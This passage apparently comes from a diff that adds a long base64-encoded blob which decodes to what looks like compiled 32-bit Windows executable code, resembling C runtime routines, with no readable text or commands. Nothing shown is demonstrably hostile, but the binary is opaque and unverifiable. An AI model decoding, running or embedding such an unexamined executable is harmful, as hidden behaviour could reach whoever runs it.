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 